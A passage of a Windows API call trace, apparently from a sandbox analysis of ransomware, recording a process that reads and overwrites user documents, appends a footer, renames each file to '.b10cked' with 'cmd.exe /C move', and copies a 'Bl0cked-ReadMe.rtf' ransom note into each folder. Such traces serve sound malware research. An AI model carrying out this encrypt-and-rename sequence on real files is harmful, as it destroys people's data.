dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xec0, dwThreadId=0xf20)) returned 1 [0138.114] CloseHandle (hObject=0x110) returned 1 [0138.114] CloseHandle (hObject=0x114) returned 1 [0138.114] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0138.114] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.114] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.115] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\0q56t.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.115] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19490470294) returned 1 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.118] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7a14 [0138.118] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.118] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x7efc [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x7efc [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.119] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3f7d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.119] WriteFile (in: hFile=0x114, lpBuffer=0x1277a98*, nNumberOfBytesToWrite=0x3f7d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1277a98*, lpNumberOfBytesWritten=0x12ec1c*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=-16253, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3f7f [0138.119] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3f7d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.120] SetFilePointer (in: hFile=0x114, lDistanceToMove=-16253, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3f7f [0138.120] WriteFile (in: hFile=0x114, lpBuffer=0x1277a98*, nNumberOfBytesToWrite=0x3f7d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1277a98*, lpNumberOfBytesWritten=0x12ec1c*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0Q56T.odt", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0138.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0Q56T.odt", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0Q56T.odt", lpUsedDefaultChar=0x0) returned 9 [0138.130] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x7efc [0138.130] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.130] CloseHandle (hObject=0x114) returned 1 [0138.131] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\0Q56T.odt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt") returned 0x2c [0138.132] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0138.132] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xf1c, dwThreadId=0xe64)) returned 1 [0138.210] CloseHandle (hObject=0x110) returned 1 [0138.210] CloseHandle (hObject=0x114) returned 1 [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0138.210] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 3 [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.210] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.210] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.210] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.210] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.210] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0138.211] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.211] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.211] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xe08, dwThreadId=0xf5c)) returned 1 [0138.304] CloseHandle (hObject=0x110) returned 1 [0138.304] CloseHandle (hObject=0x114) returned 1 [0138.304] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0138.304] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.304] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.304] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\tgRDf2UBQ_aR.pdf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\tgrdf2ubq_ar.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19509435538) returned 1 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.305] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.306] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe4f0 [0138.306] SetFilePointer (in: hFile=0x114, 